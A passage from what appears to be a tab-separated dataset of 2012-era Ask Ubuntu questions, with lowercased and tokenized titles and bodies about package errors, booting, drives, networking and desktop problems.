worked . purging i tried purging the repository , but that did n't work either . first , i got the package using sudoapt-get install ppa-purgeand then tried to purge the webapps repo usingsudo ppa-purge ppa : webapps/preview` . manually installing dependencies if you look at the error dump carefully , it says : depends : xul-ext-unity but it is not going to be installed depends : xul-ext-websites-integration but it is not going to be installed depends : xul-ext-webaccounts but it is not going to be installed so i tried installing them manually . i ran sudo apt-get install xul-ext-unity , but got this : depends : xul-ext-websites-integration but it is not going to be installed breaks : firefox ( > = 15.+ ) but 16.0~b6+build1-0ubuntu0.12.04.1~mfn4 is to be installed i have no idea what the second part means , but i tried resolving the first . running sudo apt-get install xul-ext-websites-integration gave : xul-ext-websites-integration : breaks : firefox ( > = 15.+ ) but 16.0~b6+build1-0ubuntu0.12.04.1~mfn4 is to be installed as a last resort , i tried sudo apt-get install xul-ext-webaccounts , but that gave the sane message too : breaks : firefox ( > = 14.+ ) but 16.0~b6+build1-0ubuntu0.12.04.1~mfn4 is to be installed what does breaks : firefox ( > = 14.+ ) but 16.0~b6+build1-0ubuntu0.12.04.1~mfn4 is to be installed mean ? research i tried searching google , looking at a couple of forums , looking at this question and searching on au , but to no avail . help would be appreciated .
197137	cdbexception : cdbconnection failed to open the db connection	hi i am new to ubuntu and php mysql , i have intalled xampp and learning yii , but while testing a script i got this problem , not able to figure out the solution , i have been through many forums solutions but none of them worked for me . please help . 1 ) dbtest : :testconnection cdbexception : cdbconnection failed to open the db connection . /opt/lampp/htdocs/yiiroot/framework/db/cdbconnection.php:388 /opt/lampp/htdocs/yiiroot/framework/db/cdbconnection.php:331 /opt/lampp/htdocs/yiiroot/framework/db/cdbconnection.php:309 /opt/lampp/htdocs/yiiroot/framework/base/cmodule.php:388 /opt/lampp/htdocs/yiiroot/framework/base/cmodule.php:104 /opt/lampp/htdocs/trackstar/protected/tests/unit/dbtest.php:6 failures ! tests : 1 , assertions : 0 , errors : 1 .
197139	ca n't mount my usb drive	~ > sudo mount /dev/sdb1 /media/disk did not find any restart pages in $ logfile and it was not empty . the file system was n't safely closed on windows . fixing . i have a usb hard disk and windows ca n't detect it . so i tried to open it up on ubuntu using gparted . gparted detects the ntfs partition , so everything seems to be fine ( note , though , that the total size of the files in this disk is over 1 tb ) . i tried to mount it using : sudo mount /dev/sdb1 /media/disk but i got : did not find any restart pages in $ logfile and it was not empty . the file system was n't safely closed on windows . fixing . then , the process just sits there blinking . any ideas on how to fix it ? it 's taking forever ( > 10 minutes ) , should i wait or cancel it and do something else ? thank you in advance .
197143	how to connect to internet through command-line ?	i normally connect to internet through my mobile phone 's sim card . its a gsm network . to connect to internet in gui manner i go to notification bar , click on network icon , and click on connections name . after connecting the network icon changes to indicate that i have connected to internet . can i do it in command line way ?
197149	is there any way to keep launchers synchronized among machines ?	most of us use more than one machine for our purpose . the scenario for me is to use one at home , another at office . when comes to the launcher at left , the applications get added in chronological order . you can click and drag an application in launcher , but this is a tedious process . if your application placements are different among the machines , you loose the intuitive mouse click . you need to spend a few seconds to find out where actually the launcher is before you click on it . is there any way i can keep the launcher applications ( at least the locked ones ) synchronized among machines ? thanks .
197150	ubuntu/xubuntu install freeze	i 've been trying to install ( dual boot ) ubuntu on my hp pc , link to my specs ( click here ) i 've tried to install ubuntu with both usb and dvd , same result . the installer will launch , it will load , but then all will freeze in the middle of the loading . well , i thought it was something wrong with ubuntu , so i tried xubuntu instead . same thing , the installer will go to the loading screen , but then , it 'll just freeze at the point where the `` loading cursor '' appears . any help would be very much appreciated !
197153	how to find an ip of connected vnc client from vncserver log ?	i run the vncserver using vnc4server . i take a look in ~/.vnc/ubuntu:1.log it only show something like this . sat oct 6 20:40:12 2012 connections : accepted : 0.0.0.0 : :2043 sconnection : client needs protocol version 3.8 sconnection : client requests security type vncauth ( 2 ) sat oct 6 20:40:14 2012 sconnection : authfailureexception : authentication failure connections : closed : 0.0.0.0 : :2043 ( authentication failure ) sat oct 6 20:40:16 2012 connections : accepted : 0.0.0.0 : :2048 sconnection : client needs protocol version 3.8 sconnection : client requests security type vncauth ( 2 ) how do i find the ip of connected vnc client ?
197155	dual boot 12.04 and xp	i installed 12.04 alongside xp and when i restart it says ubuntu is not there and only choice i have is xp without booting from cd for demo , i reinstalled thinking i missed somthing but no luck . what am i missing ? ? thanks think i found it i did not remember this machine had 2 hd 's and it put it on the 2nd one . but now that i took out 2nd drive it will only let me replace xp not install along side . tom h .
197161	ca n't reinstall vlc	i use vlc a lot . and when 2.0 came out ubuntu did not update to that version , the repo had the older version even months later , so i added the daily repo : http : //ppa.launchpad.net/videolan/stable-daily/ubuntu and that worked for a while , after a few months later i received a 'distribution upgrade' and when i installed it , it removed vlc . when i tried to re-install it gave me a bunch of unmet dependency 's , so i disabled the source , ran apt-get update , and tried to install the older vlc , that did not work either . i eventually found a web page , and it helped me get it working , and i was also able to get the 'stable daily ' working too but last night , i got another 'distro upgrade ' and it uninstalled vlc again . when i try to reinstall from daily i get : the following packages have unmet dependencies : vlc : depends : fonts-freefont-ttf but it is not installable depends : vlc-nox ( = 2.0.3+git20121005+r392-0~r42~precise1 ) but it is not going to be installed depends : libvlccore5 ( > = 2.0.0 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 2.0.3+git20121005+r392-0~r42~precise1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.3+git20121005+r392-0~r42~precise1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . and from the default source : vlc : depends : vlc-nox ( = 2.0.3-0ubuntu0.12.04.1 ) but it is not going to be installed depends : libvlccore5 ( > = 2.0.0 ) but it is not going to be installed recommends : vlc-plugin-notify ( = 2.0.3-0ubuntu0.12.04.1 ) but it is not going to be installed vlc-plugin-pulse : depends : vlc-nox ( = 2.0.3-0ubuntu0.12.04.1 ) but it is not going to be installed depends : libvlccore5 ( > = 2.0.0 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . any ideas ? i am using ubuntu 12.04 64bit .
197163	where can i find a list of tags for the lyx document processor ?	is there a list of tags that lyx uses somewhere defined ? and is there a comment tag ? not like a comment box , but simply a no-op sequence ( % does n't seem to work ) so i can delineate blocks of code . i can insert blocks of code using vim safer and faster than with the gui , but i want to use lyx for display ( instead of power-point ) . but once i 've inserted them , it 's easy to lose where one is . if i could delineate these blocks of code with lines like : % % % % % % begin inset % % % % % % % % ... % % % % % % % % end inset % % % % % % % %
197164	i am connected to 2 wlan . how can i choose which program uses which connection ?	i am connected to 2 wlans . one is using the integrated broadcom wireless adapter in my laptop while the other is using an external usb tp-link adapter . how can i choose which program uses which connection ? e.g i want firefox to use the integrated broadcom which is connected to ssid x while chrome uses tp-link usb adapter which is connected so ssid y
197171	installing ubuntu as the only os	i want to install ubuntu as the only os . that means remove the cuttent os win xp and install ubuntu 11.10. now it will use the entire hard disc for that . but i want to only use the c : drive for that and keep the other partitions safe . is their a method to do so ...
197173	issue with lib32asound2	i 'm complete new to ubuntu so please pardon my ignorance . every time i install something i get the same error at the end . for example ... sudo apt-get clean & & sudo apt-get autoremove fetched 386 kb in 0s ( 545 kb/s ) dpkg : error processing lib32asound2 ( -- configure ) : package lib32asound2 is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : lib32asound2 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have tried to remove and reinstall this package : sudo apt-get install lib32asound2 but with no joy same issue . how can i resolve ? p.s . i 'm running 64bit ubuntu 12.10 beta 2 . error came after trying to install skype which failed . many thanks
197177	creating physical button for eclipse juno	running 12.04 and i downloaded eclipse juno from eclipse , installed in programs directory which i had created . how do i create a physical button so it can reside on the left menu , and show up in dashboard ?
197182	tried installing skype , error on line 57 in /etc/apt/sources.list . edited file now cant open software center or install skype	i deleted line 57 which was caused the problem but put it back in and the software center opens then closes straight away and i still havent installed skype . any help with the software center and getting skype would help.. thanks . the file : # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - release i386 ( 20120423 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise universe deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.cannoical.com/ partner deb-src http : //archive.cannoical.com/ partner
197189	authentication required to modify a printer- what 's the password ?	i have 12.04 and have 2 printers installed , both wirelessly over my personal network , no printer sharing . when i try to modify the printers i get a window asking for authentication ( username and password ) . for the life of me i can not think what these might be . at first i thought it might be my ubuntu account username and password , but i ca n't get it to work . the printer username and password ( admin and access ) does n't work either . does anyone know what it is asking for , and how i can turn that off ? many thanks .
197190	toshiba satellite a660 ca n't shutdown	my ubuntu 12.04 ca n't shutdown correctly . it does n't happen all the time but it does happen quite frequently . is there any way to find out what modules ( or anything ) stops the shutdown process ? i tried the method posted here : can not shutdown my sony vaio but it does n't fix the problem .
197192	auto mount & permissions on a new hard drive	i have added a new sata hard drive to my ubuntu machine and i would like to auto mount and change the permissions on the drive so i can write to it . i have tried following one of the ubuntu guides for help to auto mount but i 'm not having any luck . also the read and write permissions change should be easy in terminal but i ca n't find anything . can anyone help this newbie please ?
197196	finding the ip address of another computer on the network ?	is there a program which can tell me the ip address of a computer when is connected to my network ? a list of names or ip addresses . for example when my wife is on my main desktop computer i can either go on another desktop or laptop and work . however i do n't know the ip address of the computer she 's on it 's dhcp and no static ip addresses . i would like to ssh into the main desktop and work on it . sometimes i have asked her if i could get on for a minute to get the ip address . from a terminal i do an ifconfig and get the address . i could get it from the router too but that is requires logging into the router . there must be some short command i can run ? all the computers are running ubuntu and samba is not installed . once i know the ip address i can ssh into the main desktop .
197201	can someone please tell me how to install xubuntu and ubuntu as two different operating systems ?	i want to be able to dice which os to run when i turn on my computer . i want to keep my original os ( windows xp ) please help me !
197202	do i have to leave a webapp open to get a status notification ?	with the integration of webapps , do i have to leave the webpage for facebook , twitter , google+ or any other social media ( or webapp enabled site for that matter ) opened to get notifications or can i fetch or configured to fetch them without having the webpage opened ? i ask since the notifications only arrive if i have the specific social media webpage opened . what i want is for them to notify me of new mail , new facebook messages or new notifications without having to have the webpage for each opened and to notify me in the messaging system here :
197203	acer aspire v5-575 wifi issues	i recently bought an aspire a5-575 laptop which works great , the only issue i 'm having is with the wifi . it seems to have a hard time connecting , and then will randomly disconnect . when it 's connected everything 's fine and i get a great signal . i 'm on ubuntu 12.04 and not sure if it 's related to
197204	thinking of switching to ubuntu ... couple of questions ?	i am planning on installing ubuntu later today , but i had a few quick questions first ... should i back up my files before installing it , or will i still be able to access them ? will my bookmarks on firefox still be accessible ? does microsoft word/powerpoint/excel/etc . work with it ? does anyone have any tips/is there anything i should know before installing it/any problems i might run into using it ? thanks : ) edit : is it possible to use both windows and ubuntu ? i use oovoo for work , and just realized that it is n't yet compatible with ubuntu
197205	double entries showed in gnome applications 12.04	after installing gnome-extensions , some of the entries in the application gnome menu appears twice with different symbols . symbols like `` eclipse '' symbols appears with the normal symbol and with the generic symbol for applications . both are executing the program . however , this is a bit disturbing . where is this coming from and how can i remove the redundant symbols . cheers gerd
197206	problems accessing lamp installation or phpmyadmin ?	i finally got networking to work , but the only page i can access is 127.0.0.1:8080 . if i , for example , attempt to access http : //localhost:8080/upload/install/install.php i get the following error : this webpage is not available the connection to 127.0.0.1 was interrupted . what should i do to gain access to all files in `` /var/www '' ? i already tried some things with apache 's config files but i guess i messed them up so i apt-get remove apache2 -- purge and apt-get install apache2 . i have also installed a complete lamp server with phpmyadmin , which i also ca n't access .
197209	ca n't boot from liveusb when trying to install it alongside windows 7	i 'm very noob at linux and installing techniques . i want to install 12.04 from bootable usb flash alongside windows 7 ( also tried live cd but not working ) but computer is not booting from usb flash or live-cd and boots windows 7 ( acer aspire 4750g ) and of course i have set the bios priority in the right way . there is one important point to tell that i have installed fedora 16 on my laptop successfully and now i have it on my system . when i was trying to install fedora i got some error and searched about it and got this point that i should delete a .efi file and then installation went right . in this case , what should i do to solve the problem ? ( i also do n't need my fedora anymore ) .
197216	how can i tell what error grub has when i ca n't read what it 's saying ?	grub wo n't allow me to get into any systems on my hp dv7 ( it runs 12.10 ) . as the screen is broken , i ca n't read what the error is . nothing works , not even the recovery mode . it gives me some error about `` can not find '' ( i think ) and press any ( i guess key ? ) when a press a key i 'm dropped back to the menu . at the moment i 'm trying all the recovery options i know . however , it would be great if someone could tell me how to know what error grub is facing from a live cd or something ( maybe a log file or something could help ) ? nb : i can view the filesystem from a livecd , and i did check the filesystem - it was clean .
197217	oauth/authenticating user for unity lenses	trying to create a lens that would touch a web service that requires oauth authentication . and a search here , netted me this : https : //wiki.ubuntu.com/unity/lenses i was using this tutorial to create a lense : http : //saravananthirumuruganathan.wordpress.com/2011/08/05/tutorial-on-writing-ubuntu-lensesplaces-in-python/ speaking with a developer with more experience than myself , he mentioned using the new online accounts in the control center , but that there was n't much documentation on how to do so . does anyone know where this documentation might exist ? or perhaps a quick tutorial/how-to/source code for handling oauth/account tokens/authentication for services in lenses ? thanks ! much appreciated !
197222	installer does n't recognize kingston ssdnow sv 200 90g	i 'm trying install ubuntu 12.04 on my new kingston ssd now svp200s3/90g , but the installer does n't list this disk to be installed . however gparted let me do any partitioning operation correctly . i 've tryed with ubuntu studio and ubuntu desktop on different machines : lenovo thinkpad t400 , lenovo thinkstation c20 , mobo asus crosshair v formula . sata controller in all machines has been set to ahci and ide operation and different sata ports with no luck . the firmware on the ssd has been updated to v.503xxx ( latest on kingston page )
197223	sound plays through head phones but not speakers	i have ubuntu 12.04 , and the sound was working . now , when i try to listen to music nothing plays , ubuntu is on my dell latitude d620 . i am wondering why this is not working to play any songs through my speakers .
197224	title bar display glitch with ambiance and radiance window theme on background window	i use ubuntu 12.04 with gnome-shell and default ambiance window theme . there is a display glitch on title bar of background windows . it can be seen on the screenshot below . the bug also occurs with with radiance window theme , and also when i use gnome-classic . i must have messed with some configuration file on my home directory because this problem does n't occur with another account ( guest account in fact ) . what can i do to simply get rid of this annoying display glitch ?
197225	is there a way how to customize my keyboard layout in xubuntu in a graphical way ( by clicking ) ?	possible duplicate , but i really could n't find a solution . i would like to adjust my us keyboard layout , e.g . to add possibility to type some special characters on combination of right alt + another character , etc . moreover , my arrow up is dead , so until i buy another keyboard , i 'd like to use my right shift as my arrow up , asap . however , there seems to be no way how to edit my keyboard layout easily in xubuntu : ( i found no editor and i really do n't want to spend years in some configuration files and terminal ( not that i ca n't , but i really really do n't want ) . kle - the only editor i could find , but no installation guide , no package , no ppa , no idea how to make it working ( and uninstallable if not needed one day ) editor in ubuntu - apparently not present in xubuntu i found several tutorials how to change the layout , but they all seems to be complicated and not easy to follow . i do n't want to spend a weekend in terminal or so , i am looking for an app to launch , make some clicking , finish my work by hitting save button and - done ! please , is there such solution ? for humans ?
197230	used mountmanager now ubuntu hangs on boot	i was using mountmanager in ubuntu 12.04 to set user permissions in mounting hard drives . i set each partititon to be mountable by everyone instead of admin only . then i clicked apply in the file menu and it gave me the message successfully updated . upon restarting ubuntu , just hangs on the splash screen and does not boot any further . windows still boots fine . how can i fix these ? please help thanks from liveusb : my fstab looks like : overlayfs / overlayfs rw 0 0 tmpfs /tmp tmpfs nosuid , nodev 0 0 /dev/sda5 swap swap defaults 0 0 /dev/sda7 swap swap defaults 0 0 is this corrupted ? other things that may be helpful : blkid returns /dev/loop0 : type= '' squashfs '' /dev/sda1 : label= '' system reserved '' uuid= '' 0af26c31f26c22e5 '' type= '' ntfs '' /dev/sda2 : uuid= '' 5e1c88e31c88b813 '' type= '' ntfs '' /dev/sda3 : uuid= '' 94b2bb7db2bb6282 '' type= '' ntfs '' /dev/sda5 : uuid= '' 41b66b9a-2b48-45cf-b59d-cd50e41ec971 '' type= '' swap '' /dev/sda6 : uuid= '' c73ca79e-4fa4-4bde-967e-670593736f6a '' type= '' ext4 '' /dev/sda7 : uuid= '' c05d659f-103c-4444-9dc4-3121b9e081d6 '' type= '' swap '' /dev/sdb1 : label= '' pendrive '' uuid= '' 1de8-0a49 '' type= '' vfat '' and cat /proc/mounts rootfs / rootfs rw 0 0 sysfs /sys sysfs rw , nosuid , nodev , noexec , relatime 0 0 proc /proc proc rw , nosuid , nodev , noexec , relatime 0 0 udev /dev devtmpfs rw , relatime , size=1950000k , nr_inodes=206759 , mode=755 0 0 devpts /dev/pts devpts rw , nosuid , noexec , relatime , gid=5 , mode=620 , ptmxmode=000 0 0 tmpfs /run tmpfs rw , nosuid , relatime , size=783056k , mode=755 0 0 /dev/sdb1 /cdrom vfat rw , relatime , fmask=0022 , dmask=0022 , codepage=cp437 , iocharset=iso8859-1 , shortname=mixed , erro rs=remount-ro 0 0 /dev/loop0 /rofs squashfs ro , noatime 0 0 tmpfs /cow tmpfs rw , noatime , mode=755 0 0 /cow / overlayfs rw , relatime , lowerdir=//filesystem.squashfs , upperdir=/cow 0 0 none /sys/fs/fuse/connections fusectl rw , relatime 0 0 none /sys/kernel/debug debugfs rw , relatime 0 0 none /sys/kernel/security securityfs rw , relatime 0 0 tmpfs /tmp tmpfs rw , nosuid , nodev , relatime 0 0 none /run/lock tmpfs rw , nosuid , nodev , noexec , relatime , size=5120k 0 0 none /run/shm tmpfs rw , nosuid , nodev , relatime 0 0 gvfs-fuse-daemon /home/ubuntu/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , relatime , user_id=999 , group_id=999 0 0
197234	rhythmbox 's is n't registering all last.fm songs in my profile , where is the problem ?	i 've been using this plugin since august , but recently it has been failing : not all the tracks are being registered in my profile . what 's going on ?
197236	software for planning schedule	i 'm looking for schedule planning software . i 'd like to be able to add weekly events , meetings that repeat every month etc. , and i expect the software to display me a schedule for the upcomming week , as well as short notes attached to planned activities . it would be great if it could synchronise my planned events via ubuntuone . what are your recommendations ?
197237	nautilus hides the window when launched	okay . so i had no problems with nautilus but then ... .bam ! it hides almost quarter of the window when launched . managed to fix it by turning off wobbly windows . do n't understand . it worked perfectly just a while back . it seems to go back to maximized when i drag a little bit of the black area but it kinda sucks doing it every time . any idea on how to fix this ? !
197248	java on ubuntu server 12.04 ?	i 'm a little confused at the moment . my back story in short , is that i 'm trying to set up a minecraft server on an ubuntu server i 've recently set up , obviously to do this i needed java , but after googling for a short while i was n't entirely sure whether it is possible ( or legal ? ) to do so in ubuntu 12.04 due to licensing type issues - so i installed open jdk instead which appears not to work properly with the minecraft server software ( i half expected this ) i 'm now considering uninstalling open jdk and instead trying to get proper java on there instead , my question is , is this possible ? is it legal ? and if so how do i go about doing it ? because i 'm finding it very difficult to find any instructions on how to do so for 12.04 . . .
197250	wubi windows installer wo n't launch on windows 98	have an old piii 1ghz machine that i 'd like to try to use as a homework writing / editing / printing machine for the kids and maybe share the printer on the home net , but it does n't look like i 'm going to be able to get ubuntu installed . please tell me if i 'm missing a trick here : no cd-rom in the machine . bios does n't have an option to boot from a usb drive windows '98 currently installed , but when i try to run wubi , it just exits . no error message , just start , stop . nothing left running in the task manager . i disabled the ( very old ) av program , no difference .
197251	can not start ubuntu-one synchronization	i have signed up for ubuntu one ( u1 ) file storage account a few months ago . i am checking it from two computers but can not start the synchronization process . on one of the computers i have about 2.2gb of files in `` ~/ubuntu one '' folder and it is always online . on the other computer i see no files in the `` ~/ubuntu one '' folder . both show as `` file sync is up-to-date '' in the u1 client . disconnecting and connecting the client changes nothing . i thought a couple months would be enough to sync . both computers have the same login name , same email , and connect to the same u1 account . both are ubuntu 12.04 . i can login to u1 interface from both u1 clients and see both computers by their names at the u1 web interface . it is strange that the u1 client : shows an empty box at the devices / other devices frame . on one computer shows 45 % used , the other shows 0 % on one computer greets me as `` hi leo ! `` , while the other says just `` hi ! '' . any suggestions about how to start the file sync ?
197257	my keyboard is screwed up	i 've had karmic installed on my computer for a few days now , and now i 'm noticing that when i press keys on my keyboard , sometimes they either do n't register , or they register an extra 20 times . like for example , typing 'a ' might return 'aaaaaaaaaaa ' . i had this same problem back when i was running a newer version of ubuntu . ( i downgraded because my dell inspiron 1501 is more compatible with 9.10 ) . i 'm not sure if this is because my laptop 's keyboard driver is messed up , or if it 's just a dirty keyboard . ( it seems clean though ) . i have n't had this problem when i use an external keyboard . fyi : typing this question was brutal .
197262	is there a gui way to see what webapps i have installed ?	i tried checking anything related to web apps in system settings like the `` online accounts '' but i could not find anything that listed the webapps i have enabled .
197263	do webapps only integrate with firefox ?	when i open firefox and visit any of the webapp enabled webpages i have installed , i get a launcher icon for them . the same does not appear to be when i use for example google chrome . do webapps only work for firefox ?
197264	cpu fan really annoying	nn a dell inspiron the cpu fan is too loud . it is not running constantly , but it changes from slow to really fast every minute . it 's really annoying and hardly possible to work on this machine . is it possible to limit the range the fan is using ? pwmcontrol says : there are no pwm-capable sensor modules installed
197266	is there a program that will emulate typewriter sounds ?	since i switched to ubuntu 12.04 i 'd only missed one thing . a program which could launch typewriter sounds while typing . for instance , in windows i used this : http : //www.colorpilot.com/soundpilot.html for a long time . i learned then that this writing program : http : //gottcode.org/focuswriter/ had the sounds but only for the program itself . however , sometimes i 'm writing an email , writing on the web or doing more complex writing tasks in libreoffice - all places where these long missed typing sounds do n't apply . does any of you know of any plans in the community of the sound bit - typing sounds - as an independent program or applet to be fetched in the ubuntu software center soon ?
197267	unable to start ubuntu	i 'm unable to start ubuntu in my laptop . i 'm sharing ubuntu with windows 7 in my laptop , and after i install ubuntu when i boot my laptop and choose ubuntu as my operating system the following error appears : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next '' . 3 . click `` repair your computer `` if you do n't have this disc , contact your system administrator it computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc0000098 info : the selected entry could not be loaded because the application is missing or corrupt . any ideas ?
197268	does anyone know how to change firefox icons ?	i have found some nice firefox icons and i 'd like to change my old icon for one new one . i have logged in as a root and went to usr/lib/firefox/icons and pasted the new icon in , but after restart it doesnt appear . it just shows a red circle instead of the icon . how could i make firefox accept the new icon ? note : i have just switched back to the root account and it works perfectly there , but when i wan na use it on my normal account it wont work . i have tried to copy the icon in the same way i copied it with the root account , but it wont let me do it . is there a way to get root access on my normal account and copy the icon ?
197269	ca n't log into ubuntu 12.04	yesterday , after turning on ubuntu , i logged into a gnome session . a few minutes later , i tried switching to unity for a change . unfortunately , the background and my desktop icons loaded , but the system bar and launcher failed to load even after several minutes . unity had always worked fine for me . i then tried the guest account , and it worked fine on both unity and gnome . however , the problem with my account got worse ; i could n't log into any desktop at all anymore . i would type in my password and press enter and it would just sit there doing nothing . the computer no longer responded in any way , so i had to hold the power button and reboot . the same problem happened repeatedly . earlier today , i tried to get on again . i found that i hadthe same problem , when i tried to log in , the computer no longer locked up , but instead flashed a black screen with theconsole output and what seemed to be an error message before returning to the log in screen . it was to quick for me to read , about 1/4-1/2 second . i 'd really appreciate some help as i have some important files that are not backed up yet . i ca n't transfer the files to a new account , or even make a new account because i tried taking the password off my account so now i ca n't authenticate from the guest to perform root functions . i 'd really appreciate some help as i have some important files that are not backed up yet . thanks .
197271	12.04 live usb unable to boot clevo m98nu	i placed 12.04 on usb with yumi . grub loads fine , and upon choosing either 'try it ' or 'install it ' , code runs up the screen . display of text disappears as normal , but then it hangs up and the caps lock light and scroll lock light both start blinking . when i use unetbootin , the same happens with exception to the blinking lock lights . i have narrow experience with linux .
197276	ubuntu stuck on login screen and it goes black	i recently install the latest version of ubuntu and it went perfect . since that is stuck in login screen and i ca n't even type anything from keyboard and use my mouse to do something . then after 5 minutes , it does black like its in idea mode and stay as same condition for while . i have to turn it off manually and on to get to my home screen or login screen . i tried ctrl+alt+f1 , and e key but nothing works . please , help me out . and i would like to install windows xp instead of ubuntu , is it possible to install in this mode , i tried once but does not work so , i think i need to start ubuntu first then i could install windows xp ?
197279	ubuntu 12.04 locks up when it tries to play a sound	i have a new installation of 12.04 on a new desktop pc . according to update manager , it 's all up-to-date . very reliably , the desktop will lockup whenever it tries to play a sound effect . i can open up terminal , then press tab once ( which usually causes a system beep ) , and the desktop is now locked up . the mouse cursor can still move , but mouse + keyboard has no effect and the display is frozen . from there i can ctrl+alt+f1 to get to a command line , then stop and start 'lightdm ' to get a new running desktop . the bug is repeatable from there . a related issue , if i try going to system settings and then clicking 'sound ' , then nothing happens except 'system settings ' window freezes and does n't respond to any more input . thanks for any help ! edit with some more details : i ran ps aux and noticed that there were about 10 instances of /usr/bin/pulseaudio running , which seems bad . i ran killall pulseaudio and the freeze bug is no longer reproducible .
197285	ubuntu frozen on boot screen ; boot repair fails due to x11 and gtk	i have a year-old hp pavilion dv6 with intel i7 processors and graphics card . i had windows 7 but last week i dual booted ubuntu . it was working fine until today . i did the following things : updated gnome and installed gnome tweak tool uninstalled chromium browser uninstalled google chrome moved jdk and jre folders from ~/ to /bin using sudo moved adobe folder from ~/ to /bin using sudo then i restarted . ubuntu froze for half an hour on the purple boot screen . something i did must have broken it . so , i hit ctrl + alt + f1 and managed to log in through the command line . from there , i ran sudo apt-get update and sudo apt-get upgrade . i also updated grub . i also installed boot-repair . however , i can not run boot-repair , because i keep getting the following errors : autolaunch error : x11 initialization failed runtimeerror : gtk could n't be initialized .
197294	how to change screenshot file type from png to jpg when doing a print screen on lubuntu ?	this computer is running on lubuntu . print screen will do a screenshot and save it automatically . however , the default image file is saved as png . i 'd like to save it as jpg automatically . i tried to look through the system preference and such but no luck . is there any command or setting that i can change so that it will save as jpg instead of png ? i 'd prefer to not install any new apps like the search results have suggested > . < unless of course that it is really the only solution .
197295	ca n't connect to wireless network with a sabrent a111n usb dongle	i 've been trying to connect to this network for quite some time . i ca n't directly connect to the router with a wire , but can access the router with other wireless devices without any issues . i had previously tried several other wifi nic 's but none of them would load properly . today , i went and bought a new ( supported ) sabrent a111n usb dongle , which said explicitly that it works with linux 2.4 + . i popped the dongle in , and low-and-behold it immediately said that there were available wireless connections . i selected my connection and tried to connect , but it just loops constantly while saying wireless disconnected then attempts to connect again over and over . ifconfig and iwconfig both show my device in a ready and working state . however , iwlist wlan0 scan says that there are no results found . i do n't get it ... at one point , i could see the cpu in the dhcp client list under the router , but it does n't fully make the connection ( something about a timeout ? ) . any help would be appreciated . bus 001 device 002 : id 0bda:8176 realtek semiconductor corp. rtl8188cus 802.11n wlan
197308	how to change screen resolution for installation	i am trying to install unity on an old computer with a 1.7 ghz cpu but the installation windows only show the top quarter of the window ( so unable to see or select all the prompts in the window ) . i have tired going to system settings , but because i can not see all of windows , i can not change system settings to make the resolution smaller . is there any way to change the resolution so that i can see the full window so that i can complete the installation ?
197309	ubuntu one folder not viewable with desktop client	i can see my files in the ~/ubuntu one folder using the web ui , but when i try to using the explore button on the desktop client i get the error : '' no such file or directory '' . any one else having this issue , any one solve it ? ubuntu 12.04 enlightenment desktop tia
197310	is it possible to install kernel 3.0.0-xx in 12.04 ?	its posible install the kernel 3.0.0-xx in precise , because i having problems with the new kernel , specially with my video card , but in oneiric with the kernel 3.0.0-26-generic-pae my video card works well . in case i can do it , how can do it ? . thank you so much .
197314	how do i scroll-back in a virt-manager virtual machine console ?	i have been using virt-manager to manage a few kvm guests fruitfully on my computer so far . it 's simple and quite viable . nevertheless , up to now , i have n't found a way to scroll back lines displayed in a virtual machine console . i would like to have this ability in case a guest does n't boot properly , i have a quicker way to nail down the cause . any hints ?
197320	enable mic in wine ? ( alsa/pulseaudio )	i 'm not able to make mic work with wine 1.5 i found some suggestions but they do n't seem to work . anyone manage to fix this bug ? reference : http : //ubuntuforums.org/showthread.php ? t=1960599 http : //alessandromuratore.wordpress.com/2011/08/24/how-to-make-the-microphone-work-in-rosetta-stone-under-ubuntu/
